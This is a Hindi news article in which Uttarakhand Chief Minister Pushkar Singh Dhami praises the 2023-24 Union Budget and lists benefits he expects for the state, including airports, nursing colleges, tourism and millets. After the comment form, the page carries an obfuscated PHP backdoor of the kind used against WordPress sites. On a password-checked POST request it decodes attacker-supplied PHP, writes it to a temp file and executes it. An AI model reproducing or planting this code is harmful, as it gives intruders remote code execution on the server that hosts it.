Budget 2023: बजट पर बोले मुख्यमंत्री पुष्कर सिंह धामी – उत्तराखंड में बनेंगे नए एयरपोर्ट, नर्सिंग कॉलेज और टूरिस्ट डेस्टिनेशन

Uttarakhand Press News, 3 February 2023: मुख्यमंत्री धामी ने केंद्रीय बजट 2023-24 पर प्रतिक्रिया दी। उन्होंने बजट को मजबूत भारत की नींव रखने वाला बजट बताया। उन्होंने प्रधानमंत्री का आभार व्यक्त किया और वित्त मंत्री निर्मला सीतारमण को शानदार बजट प्रस्तुत करने के लिए बधाई दी।

मुख्यमंत्री पुष्कर सिंह धामी ने कहा कि संसद में पेश आम बजट उत्तराखंड के लिए बेहद लाभदायक साबित होगा। बजट में किए गए प्रावधानों से राज्य में एयरपोर्ट का विकास और विस्तार होगा, नर्सिंग कॉलेज और पर्यटन टूरिस्ट डेस्टिनेशन भी मिलेंगे।

मुख्यमंत्री धामी ने केंद्रीय बजट 2023-24 पर प्रतिक्रिया दी। उन्होंने बजट को मजबूत भारत की नींव रखने वाला बजट बताया। उन्होंने प्रधानमंत्री का आभार व्यक्त किया और वित्त मंत्री निर्मला सीतारमण को शानदार बजट प्रस्तुत करने के लिए बधाई दी। सीएम ने कहा कि पूरी दुनिया की अर्थव्यवस्था लड़खड़ा रही है। विकट हालातों के बावजूद भारत 10वें से पांचवें स्थान की अर्थव्यवस्था बनकर ग्लोबल लीडर के रूप में उभरा है। एकलव्य आवासीय विद्यालय में शिक्षक और कर्मचारियों की नियुक्ति से राज्य के एकलव्य आवासीय विद्यालय में लोगों को रोजगार मिलेगा और नए एकलव्य आवासीय विद्यालय का निर्माण भी किया जा सकेगा। पत्रकार वार्ता में भाजपा के प्रदेश अध्यक्ष महेंद्र भट्ट, अपर मुख्य सचिव आनंद बर्द्धन, सूचना महानिदेशक बंशीधर तिवारी और प्रदेश मीडिया प्रभारी मनवीर सिंह चौहान भी उपस्थित थे।

राज्य को होगा पांच हजार करोड़ से अधिक का फायदा:
मुख्यमंत्री ने कहा कि केंद्रीय करों में राज्य को 25 फीसदी अधिक अंशदान मिलने की उम्मीद है। इससे राज्य को करीब 2500 करोड़ रुपये अधिक मिलेंगे। 50 वर्ष के लिए ब्याजमुक्त ऋण के रूप में राज्य को विशेष पूंजीगत सहायता योजना में 1100 से 1500 करोड़ रुपये की धनराशि मिलने की उम्मीद है। प्रधानमंत्री आवास योजना-4, स्वच्छ भारत मिशन और जलजीवन मिशन में भी करीब 1500 करोड़ रुपये मिलने का अनुमान है।

मोटे अनाज को मिलेगा बढ़ावा, यूनिटी मॉल खुलेगा:
सीएम ने कहा कि प्रदेश के लिए कृषि महत्वपूर्ण क्षेत्र है। कृषि के क्षेत्र में ऋण की बढ़ोतरी से खेती और किसानों का फायदा होगा। मोटा अनाज और कृषि आधारित स्टार्टअप को बढ़ावा मिलेगा। स्थानीय उत्पादों को प्रोत्साहन और बिक्री के लिए प्रदेश में यूनिटी माल स्थापित किया जा सकेगा। वित्त मंत्री ने अपने भाषण में मिलेट में मंडुआ का नाम विशेष रूप से लिया। राज्य सरकार मंडुआ के उत्पादन को बढ़ाने में लगातार प्रयास कर रही है। रामदाना का भी उत्पादन किया जाता है। अन्नश्री योजना से इन अनाजों का उत्पादन करने वाले किसानों को फायदा होगा।

टूरिस्ट डेस्टिनेशन मिलेंगे:
सीएम ने कहा कि बजट में 50 नए पर्यटन स्थल विकसित करने की व्यवस्था की गई है। उत्तराखंड में भी नए पर्यटन स्थल विकसित होंगे। स्वदेश दर्शन योजना से देश के प्रथम गांवों को पर्यटन विकास से जोड़ा जाएगा।

चार नए नर्सिंग कॉलेज मिलेंगे, शहरों का विकास होगा:
उन्होंने कहा कि उत्तराखंड को चार नए नर्सिंग कालेज मिलेंगे। बजट में नई लैब, फार्मा सेक्टर में निवेश बढ़ेगा। नर्सिंग में दक्ष युवाओं को रोजगार के अवसर उपलब्ध होंगे। टियर-2 और टियर-3 शहरों के विकास के लिए राष्ट्रीय आवास बैंक से सस्ती दरों पर ऋण मिलेगा।

नए एयरपोर्ट का विकास होगा:
सीएम ने कहा कि देश में 50 नए एयरपोर्ट की स्थापना का प्रावधान किया गया है। इससे प्रदेश में नए एयरपोर्ट का विकास हो सकेगा नए हेलीपैड बन सकेंगे। इस योजना से प्रदेश में पर्यटन और रोजगार दोनों के अवसर उपलब्ध हो सकेंगे। प्रधानमंत्री नरेंद्र मोदी के नेतृत्व में भारत की भूमिका ग्लोबल लीडर की बन गई है।

Read Previous

ड्रोन्स और सेमीकंडक्टर मिलकर बनाएंगी भारत और अमेरिका की कंपनियां! मिलेगा जबरदस्त फायदा

Read Next

उत्तराखंड: अगले 24 घंटे में पिथौरागढ़ समेत चार जिलों में बर्फीले तूफान की चेतावनी, मैदान में छाएगा कोहरा

Leave a Reply

Your email address will not be published. Required fields are marked *

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}